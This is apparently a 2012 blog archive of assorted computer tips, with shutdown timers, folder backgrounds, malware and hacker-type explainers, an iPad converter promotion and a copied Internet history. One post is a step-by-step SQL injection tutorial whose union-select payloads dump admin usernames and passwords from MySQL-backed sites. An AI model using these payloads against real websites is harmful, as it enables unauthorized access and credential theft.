GEO NEWS

Tuesday 31 January 2012

How to Shutdown PC with timer

Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!
********** METHOD 1 ***************
1.    Right click on your desktop and choose "New=>shortcuts".
2.    In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
3.    Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse

TO ABORT:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
********* METHOD 2 *************
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in

start=>Run
Type Code: at 11:35 shutdown -s

TO ABORT:
Code:shutdown -a

Make a Photo Background in Drives


Perform the following steps ..>>

 Open notepad and copy the following code :

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=D:\Wallpapers\celeb\Genelia.jpg
iconarea_text=0x00FFFFFF


 Here, the path in the 2nd line of code represents the path of your picture. so just change at dere only....
 Now save this file as DESKTOP.INI in the location(any drive or any folder) where you desire to set the background picture.
 After setting it in your favourite location,close the drive and open the location again.
DONE !! .. your picture has been set as background picture for your desired location.
 

NOTE : Make sure that the extension in the path should be .jpg only and file should be saved as DESKTOP.INI only.

Virus Types



What is a Computer Virus ? A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
Types of viruses :-
The different types of viruses are as follows-
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :-Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :-A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :-These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.
5) Polymorphic Viruses :-
Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.
6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.

Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.

This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won't be covered under this tutorial.
Before we continue it is important to understand the generic malware terms that you will be reading about.

Backdoor- A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Hijackers- A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker's own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.
Spyware- A program that monitors your activity or information on your computer and sends that information to a remote computer without your Knowledge.

Adware- A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware.
There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.

Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.

Trojan- A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.

Worm- A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.

Hackers Types



Hackers are three types:-
 
1.    White hat hacker
2.    Gray hat hacker
3.    Black hat hacker


White Hat and Grey Hat Hacker & What is the Real Difference?
 
What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

 


What Is A White Hat Hacker?
 
A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of  cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.
In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.
 
 When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.


On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.




Grey Hat Hackers:

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime. 

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.
Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government.

The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events.

Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.



Black Hat Hackers:

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals. 


Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult. 

Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. 

The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.
 
What Is Black Hat Hacking?
 
A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transfernces to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigrou.

Website Hacking


     Learn How To Hack Websites With Different Techniques..    
(EDUCATIONAL PURPOSE ONLY)


SQL Injection in MySQL Databases:-


SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2


Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4


We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5


In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7


Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Install window XP In 10 Min.



>>Hey Guys Diz Time Extreme Hack That You Will Never Imagine But Its Truth and We have Done It. This Time I will explain How to Install Windows XP In Just 10 minutes.<< Read On Enjoyyyyyy!~

As We all know that During Formatting a Computer After the File Copying is Completed then windows Require 39 Minutes Time...But What Extreme In It.... Yes We can Bypass this faking Time .... How TO DO IT??? So read On..
I have Included Snaps Shots That will help you.

>> INSTALLING WIN XP IN 10 MINUTES! <<
STEP1 : After the Copy Part is Over ... System is Rebooted as we all know In general Foramatting Procedure...
Now After Reboot The Below Image Will Appear....




STEP 2: Now As This Image APPEARS You Have to Press  "Shift + F10 "  . This Will Open The command Prompt...  Now type  taskmgr  in it. This will open the Task manager .

STEP 3 : After The task Manager Opens Goto Processes ... And Find "Setup.exe"  process and Right CLICK on It.... and set the Priority to Highest....



 
STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....

Thats the Overall Tutorial...Hope You all Have LIKED IT...

So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes....Enjoy Hacking.~

                                                       

Monday 30 January 2012

How to Convert DVD and Video to Your Fashionable iPad




iPad has been released for about a month, but it is pretty popular among people. I think you guys who got iPad are very proud. How do you make full use of its great space without spending extra money? Show it off before friends? It is the best choice to use DVD collection and video you have. But how do you deal with it?
Recently I got the information from internet. I feel it is useful for all, so I’d like to share it with you guys. It is third-party software that can rip DVD and convert video for iPad. And the whole process is so easy. They are Aiseesoft DVD to iPad Converter and Aiseesoft iPad Video Converter.

Next it is divided into two parts to describe it in details.
Part One: How to Rip DVD to iPad.
Firstly you need download the software: Aiseesoft DVD to iPad Converter. And then install and run DVD to iPad Converter.
The specific operating steps as follows:



Step 1: Load DVD.
Click "Load DVD" to add your DVD contents.
Step 2: Set output video format.
Click "Profile" button from the drop-down list to select the exact output video format that is the most suitable for your iPad. You can click the "Settings" button to set parameters of your output video such as such as Resolution, Video Bitrate, Frame Rate, Audio Channels, Sample Rate, etc. to get the best video quality as you want.
Step 3: Select the output path by clicking “Browse” button from the line of destination.
Step 4: Click the "Start" button to start the conversion.

Part Two: How to Convert Video to iPad.

Also it is the same. Firstly download the software: Aiseesoft iPad Video Converter. And then install and run iPad Video Converter.

The specific operating steps as follows:



Step 1: Add video.
Click "Add Video" to add your video contents.
Step 2: Set output video format.
Click "Profile" button from the drop-down list to select the exact output video format that is the most suitable for your iPad. You can click the "Settings" button to set parameters of your output video such as such as Resolution, Video Bitrate, Frame Rate, Audio Channels, Sample Rate, etc. to get the best video quality as you want.
Step 3: Select the output path by clicking “Browse” button from the line of destination.
Step 4: Click the "Start" button to start the conversion.

Tips:
The two pieces of software have some basically editing functions such as trim, crop, effect,
1. Trim:
Three ways to do trim:
a. Drag the “start scissors bar” button to where you want to start and “end scissors bar” button where you want to end. (1)
b. You can click the “Trim From” button when you want to start the trim during your preview and click “Trim To” button when you want to end.
c. Set the exact “start time” and “end time” at right part of the trim window and click “ok”.


2. Crop:
Three ways to do crop
a. Select one crop mode from the “Crop Mode” drop-list.
b. Dragging crop frame to choose your own crop.
c. Set your own crop value.


3. Effect
Drag the adjustment bar to find your favorite effect of Brightness, Contrast, Saturation and Volume.


4. Merge into one file.
Pick the “Merge into one file” to merge the files you choose into one output file. (2)

There is another piece of software named iPad Converter Suite. It includes DVD to iPad Converter, iPad Video Converter and iPad Transfer.

Type With an Onscreen Keyboard


Whether you have trouble with your hands or you just prefer using the mouse, typing with Windows' onscreen keyboard can be a great convenience. Navigate to Start > All Programs > Accessories > Accessibility, and click "On-Screen Keyboard." Click OK to clear the dialogue box and then start "typing"—you can even change the settings to "press" keys just by hovering your mouse over the letter you want (enable this feature by selecting "Typing Mode" from the Settings menu).

Shut Down from Your Desktop

If you're trying to eliminate every extraneous mouse click, you can shut down your computer with an icon on the desktop. Right-click on your desktop, click "New," and then click "Shortcut." In the "Type the location of the item" field, type "shutdown -s -t 00" to give you a way to shut down the computer immediately. (Change the -s to -r to create a reboot shortcut instead.)

Saturday 21 January 2012

History of the Internet

The history of the Internet began with the development of computers in the 1950s. This began with point-to-point communication between mainframe computers and terminals, expanded to point-to-point connections between computers and then early research into packet switching. Packet switched networks such as ARPANET, Mark I at NPL in the UK, CYCLADES, Merit Network, Tymnet, and Telenet, were developed in the late 1960s and early 1970s using a variety of protocols. The ARPANET in particular led to the development of protocols for internetworking, where multiple separate networks could be joined together into a network of networks.

In 1982 the Internet Protocol Suite (TCP/IP) was standardized and the concept of a world-wide network of fully interconnected TCP/IP networks called the Internet was introduced. Access to the ARPANET was expanded in 1981 when the National Science Foundation (NSF) developed the Computer Science Network (CSNET) and again in 1986 when NSFNET provided access to supercomputer sites in the United States from research and education organizations. Commercial internet service providers (ISPs) began to emerge in the late 1980s and 1990s. The ARPANET was decommissioned in 1990. The Internet was commercialized in 1995 when NSFNET was decommissioned, removing the last restrictions on the use of the Internet to carry commercial traffic.

Since the mid-1990s the Internet has had a drastic impact on culture and commerce, including the rise of near-instant communication by electronic mail, instant messaging, Voice over Internet Protocol (VoIP) "phone calls", two-way interactive video calls, and the World Wide Web with its discussion forums, blogs, social networking, and online shopping sites. The research and education community continues to develop and use advanced networks such as NSF's very high speed Backbone Network Service (vBNS), Internet2, and National LambdaRail. Increasing amounts of data are transmitted at higher and higher speeds over fiber optic networks operating at 1-Gbit/s, 10-Gbit/s, or more. The Internet continues to grow, driven by ever greater amounts of online information and knowledge, commerce, entertainment and social networking.
It is estimated that in 1993 the Internet carried only 1% of the information flowing through two-way telecommunication. By 2000 this figure had grown to 51%, and by 2007 more than 97% of all telecommunicated information was carried over the Internet.[1]
History of computing
Hardware before 1960
Hardware 1960s to present
Hardware in Soviet Bloc countries

Artificial intelligence
Computer science
Operating systems
Programming languages
Software engineering

Graphical user interface
Internet
Personal computers
Laptops
Video games
World Wide Web

Timeline of computing
  • 2400 BC–1949
  • 1950–1979
  • 1980–1989
  • 1990–1999
  • 2000–2009
  • More timelines...

More...
Internet history timeline
Early research and development:
  • 1961 First packet-switching papers
  • 1966 Merit Network founded
  • 1966 ARPANET planning starts
  • 1969 ARPANET carries its first packets
  • 1970 Mark I network at NPL (UK)
  • 1970 Network Information Center (NIC)
  • 1971 Merit Network's packet-switched network operational
  • 1971 Tymnet packet-switched network
  • 1972 Internet Assigned Numbers Authority (IANA) established
  • 1973 CYCLADES network demonstrated
  • 1974 Telenet packet-switched network
  • 1976 X.25 protocol approved
  • 1979 Internet Activities Board (IAB)
  • 1980 USENET news using UUCP
  • 1980 Ethernet standard introduced
  • 1981 BITNET established
Merging the networks and creating the Internet:
  • 1981 Computer Science Network (CSNET)
  • 1982 TCP/IP protocol suite formalized
  • 1982 Simple Mail Transfer Protocol (SMTP)
  • 1983 Domain Name System (DNS)
  • 1983 MILNET split off from ARPANET
  • 1986 NSFNET with 56 kbit/s links
  • 1986 Internet Engineering Task Force (IETF)
  • 1987 UUNET founded
  • 1988 NSFNET upgraded to 1.5 Mbit/s (T1)
  • 1988 OSI Reference Model released
  • 1988 Morris worm
  • 1989 Border Gateway Protocol (BGP)
  • 1989 PSINet founded, allows commercial traffic
  • 1989 Federal Internet Exchanges (FIXes)
  • 1990 GOSIP (without TCP/IP)
  • 1990 ARPANET decommissioned
  • 1990 Advanced Network and Services (ANS)
  • 1990 UUNET/Alternet allows commercial traffic
  • 1990 Archie search engine
  • 1991 Wide area information server (WAIS)
  • 1991 Gopher
  • 1991 Commercial Internet eXchange (CIX)
  • 1991 ANS CO+RE allows commercial traffic
  • 1991 World Wide Web (WWW)
  • 1992 NSFNET upgraded to 45 Mbit/s (T3)
  • 1992 Internet Society (ISOC) established
  • 1993 Classless Inter-Domain Routing (CIDR)
  • 1993 InterNIC established
  • 1993 Mosaic web browser released
  • 1994 Full text web search engines
  • 1994 North American Network Operators' Group (NANOG) established
Commercialization, privatization, broader access leads to the modern Internet:
  • 1995 New Internet architecture with commercial ISPs connected at NAPs
  • 1995 NSFNET decommissioned
  • 1995 GOSIP updated to allow TCP/IP
  • 1995 very high-speed Backbone Network Service (vBNS)
  • 1995 IPv6 proposed
  • 1998 Internet Corporation for Assigned Names and Numbers (ICANN)
  • 1999 IEEE 802.11b wireless networking
  • 1999 Internet2/Abilene Network
  • 1999 vBNS+ allows broader access
  • 2000 Dot-com bubble bursts
  • 2001 Code Red I, Code Red II, and Nimda worms
  • 2003 National LambdaRail founded
Examples of popular Internet services:
  • 1990 IMDb Internet movie database
  • 1995 Amazon.com online retailer
  • 1995 eBay online auction and shopping
  • 1995 Craigslist classified advertisements
  • 1996 Hotmail free web-based e-mail
  • 1997 Babel Fish automatic translation
  • 1998 Google Search
  • 1999 Napster peer-to-peer file sharing
  • 2001 Wikipedia, the free encyclopedia
  • 2003 LinkedIn business networking
  • 2003 Myspace social networking site
  • 2003 Skype Internet voice calls
  • 2003 iTunes Store
  • 2004 Facebook social networking site
  • 2004 Podcast media file series
  • 2004 Flickr image hosting
  • 2005 YouTube video sharing
  • 2005 Google Earth virtual globe
  • 2006 Twitter microblogging
  • 2007 Google Street View
  • 2009 Bing search engine

Contents

 [hide] 
  • 1 Precursors
  • 2 Three terminals and an ARPA
  • 3 Packet switching
  • 4 Networks that led to the Internet
    • 4.1 ARPANET
    • 4.2 NPL
    • 4.3 Merit Network
    • 4.4 CYCLADES
    • 4.5 X.25 and public data networks
    • 4.6 UUCP and Usenet
  • 5 Merging the networks and creating the Internet (1973–90)
    • 5.1 TCP/IP
    • 5.2 ARPANET to the federal wide area networks: MILNET, NSI, ESNet, CSNET, and NSFNET
    • 5.3 Transition towards the Internet
  • 6 TCP/IP goes global (1989–2000)
    • 6.1 CERN, the European Internet, the link to the Pacific and beyond
    • 6.2 Global digital divide
      • 6.2.1 Africa
      • 6.2.2 Asia and Oceania
      • 6.2.3 Latin America
    • 6.3 Opening the network to commerce
    • 6.4 Internet Engineering Task Force
    • 6.5 Request for Comments
    • 6.6 NIC, InterNIC, IANA and ICANN
  • 7 Globalization and the 21st century
  • 8 Futurology: Beyond Earth and TCP/IP (2010 to present)
  • 9 Use and culture
    • 9.1 E-mail and Usenet
    • 9.2 From gopher to the WWW
    • 9.3 Search engines
    • 9.4 Dot-com bubble
    • 9.5 Online population forecast
    • 9.6 Mobile phones and the Internet
  • 10 Historiography
  • 11 See also
  • 12 References
  • 13 Further reading
  • 14 External links

Precursors

The Internet has precursors that date back to the 19th century, especially the telegraph system, more than a century before the digital Internet became widely used in the second half of the 1990s. The concept of data communication – transmitting data between two different places, connected via some kind of electromagnetic medium, such as radio or an electrical wire – predates the introduction of the first computers. Such communication systems were typically limited to point to point communication between two end devices. Telegraph systems and telex machines can be considered early precursors of this kind of communication.

Early computers used the technology available at the time to allow communication between the central processing unit and remote terminals. As the technology evolved, new systems were devised to allow communication over longer distances (for terminals) or with higher speed (for interconnection of local devices) that were necessary for the mainframe computer model. Using these technologies it was possible to exchange data (such as files) between remote computers. However, the point to point communication model was limited, as it did not allow for direct communication between any two arbitrary systems; a physical link was necessary. The technology was also deemed as inherently unsafe for strategic and military use, because there were no alternative paths for the communication in case of an enemy attack.

Three terminals and an ARPA

A fundamental pioneer in the call for a global network, J. C. R. Licklider, articulated the ideas in his January 1960 paper, Man-Computer Symbiosis.
"A network of such [computers], connected to one another by wide-band communication lines [which provided] the functions of present-day libraries together with anticipated advances in information storage and retrieval and [other] symbiotic functions."
—J.C.R. Licklider, [2]
In August 1962, Licklider and Welden Clark published the paper "On-Line Man Computer Communication", one of the first descriptions of a networked future.
In October 1962, Licklider was hired by Jack Ruina as Director of the newly established Information Processing Techniques Office (IPTO) within DARPA, with a mandate to interconnect the United States Department of Defense's main computers at Cheyenne Mountain, the Pentagon, and SAC HQ. There he formed an informal group within DARPA to further computer research. He began by writing memos describing a distributed network to the IPTO staff, whom he called "Members and Affiliates of the Intergalactic Computer Network". As part of the information processing office's role, three network terminals had been installed: one for System Development Corporation in Santa Monica, one for Project Genie at the University of California, Berkeley and one for the Compatible Time-Sharing System project at the Massachusetts Institute of Technology (MIT). Licklider's identified need for inter-networking would be made obvious by the apparent waste of resources this caused.
"For each of these three terminals, I had three different sets of user commands. So if I was talking online with someone at S.D.C. and I wanted to talk to someone I knew at Berkeley or M.I.T. about this, I had to get up from the S.D.C. terminal, go over and log into the other terminal and get in touch with them. [...] I said, it's obvious what to do (But I don't want to do it): If you have these three terminals, there ought to be one terminal that goes anywhere you want to go where you have interactive computing. That idea is the ARPAnet."
Robert W. Taylor, co-writer with Licklider of "The Computer as a Communications Device", in an interview with The New York Times[3]
Although he left the IPTO in 1964, five years before the ARPANET went live, it was his vision of universal networking that provided the impetus that led his successors such as Lawrence Roberts and Robert Taylor to further the ARPANET development. Licklider later returned to lead the IPTO in 1973 for two years.[4]

Packet switching

At the tip of the problem lay the issue of connecting separate physical networks to form one logical network. During the 1960s, Paul Baran (RAND Corporation), produced a study of survivable networks for the US military. Information transmitted across Baran's network would be divided into what he called 'message-blocks'. Independently, Donald Davies (National Physical Laboratory, UK), proposed and developed a similar network based on what he called packet-switching, the term that would ultimately be adopted. Leonard Kleinrock (MIT) developed mathematical theory behind this technology. Packet-switching provides better bandwidth utilization and response times than the traditional circuit-switching technology used for telephony, particularly on resource-limited interconnection links.[5]
Packet switching is a rapid store-and-forward networking design that divides messages up into arbitrary packets, with routing decisions made per-packet. Early networks used message switched systems that required rigid routing structures prone to single point of failure. This led Tommy Krash and Paul Baran's U.S. military funded research to focus on using message-blocks to include network redundancy,[6] which in turn led to the widespread urban legend that the Internet was designed to resist nuclear attack.[7][8]

Networks that led to the Internet

ARPANET

Promoted to the head of the information processing office at DARPA, Robert Taylor intended to realize Licklider's ideas of an interconnected networking system. Bringing in Larry Roberts from MIT, he initiated a project to build such a network. The first ARPANET link was established between the University of California, Los Angeles and the Stanford Research Institute on 22:30 hours on October 29, 1969.
"We set up a telephone connection between us and the guys at SRI ...", Kleinrock ... said in an interview: "We typed the L and we asked on the phone,
"Do you see the L?"
"Yes, we see the L," came the response.
We typed the O, and we asked, "Do you see the O."
"Yes, we see the O."
Then we typed the G, and the system crashed ...
Yet a revolution had begun" ....[10]
By December 5, 1969, a 4-node network was connected by adding the University of Utah and the University of California, Santa Barbara. Building on ideas developed in ALOHAnet, the ARPANET grew rapidly. By 1981, the number of hosts had grown to 213, with a new host being added approximately every twenty days.[11][12]
ARPANET became the technical core of what would become the Internet, and a primary tool in developing the technologies used. ARPANET development was centered around the Request for Comments (RFC) process, still used today for proposing and distributing Internet Protocols and Systems. RFC 1, entitled "Host Software", was written by Steve Crocker from the University of California, Los Angeles, and published on April 7, 1969. These early years were documented in the 1972 film Computer Networks: The Heralds of Resource Sharing.
International collaborations on ARPANET were sparse. For various political reasons, European developers were concerned with developing the X.25 networks. Notable exceptions were the Norwegian Seismic Array (NORSAR) in 1972, followed in 1973 by Sweden with satellite links to the Tanum Earth Station and Peter Kirstein's research group in the UK, initially at the Institute of Computer Science, London University and later at University College London.[13]

NPL

In 1965, Donald Davies of the National Physical Laboratory (United Kingdom) proposed a national data network based on packet-switching. The proposal was not taken up nationally, but by 1970 he had designed and built the Mark I packet-switched network to meet the needs of the multidisciplinary laboratory and prove the technology under operational conditions.[14] By 1976 12 computers and 75 terminal devices were attached and more were added until the network was replaced in 1986.

Merit Network

The Merit Network[15] was formed in 1966 as the Michigan Educational Research Information Triad to explore computer networking between three of Michigan's public universities as a means to help the state's educational and economic development.[16] With initial support from the State of Michigan and the National Science Foundation (NSF), the packet-switched network was first demonstrated in December 1971 when an interactive host to host connection was made between the IBM mainframe computer systems at the University of Michigan in Ann Arbor and Wayne State University in Detroit.[17] In October 1972 connections to the CDC mainframe at Michigan State University in East Lansing completed the triad. Over the next several years in addition to host to host interactive connections the network was enhanced to support terminal to host connections, host to host batch connections (remote job submission, remote printing, batch file transfer), interactive file transfer, gateways to the Tymnet and Telenet public data networks, X.25 host attachments, gateways to X.25 data networks, Ethernet attached hosts, and eventually TCP/IP and additional public universities in Michigan join the network.[17][18] All of this set the stage for Merit's role in the NSFNET project starting in the mid-1980s.

CYCLADES

The CYCLADES packet switching network was a French research network designed and directed by Louis Pouzin. First demonstrated in 1973, it was developed to explore alternatives to the initial ARPANET design and to support network research generally. It was the first network to make the hosts responsible for the reliable delivery of data, rather than the network itself, using unreliable datagrams and associated end-to-end protocol mechanisms.[19][20]

X.25 and public data networks

Based on ARPA's research, packet switching network standards were developed by the International Telecommunication Union (ITU) in the form of X.25 and related standards. While using packet switching, X.25 is built on the concept of virtual circuits emulating traditional telephone connections. In 1974, X.25 formed the basis for the SERCnet network between British academic and research sites, which later became JANET. The initial ITU Standard on X.25 was approved in March 1976.[21]
The British Post Office, Western Union International and Tymnet collaborated to create the first international packet switched network, referred to as the International Packet Switched Service (IPSS), in 1978. This network grew from Europe and the US to cover Canada, Hong Kong and Australia by 1981. By the 1990s it provided a worldwide networking infrastructure.[22]
Unlike ARPANET, X.25 was commonly available for business use. Telenet offered its Telemail electronic mail service, which was also targeted to enterprise use rather than the general email system of the ARPANET.
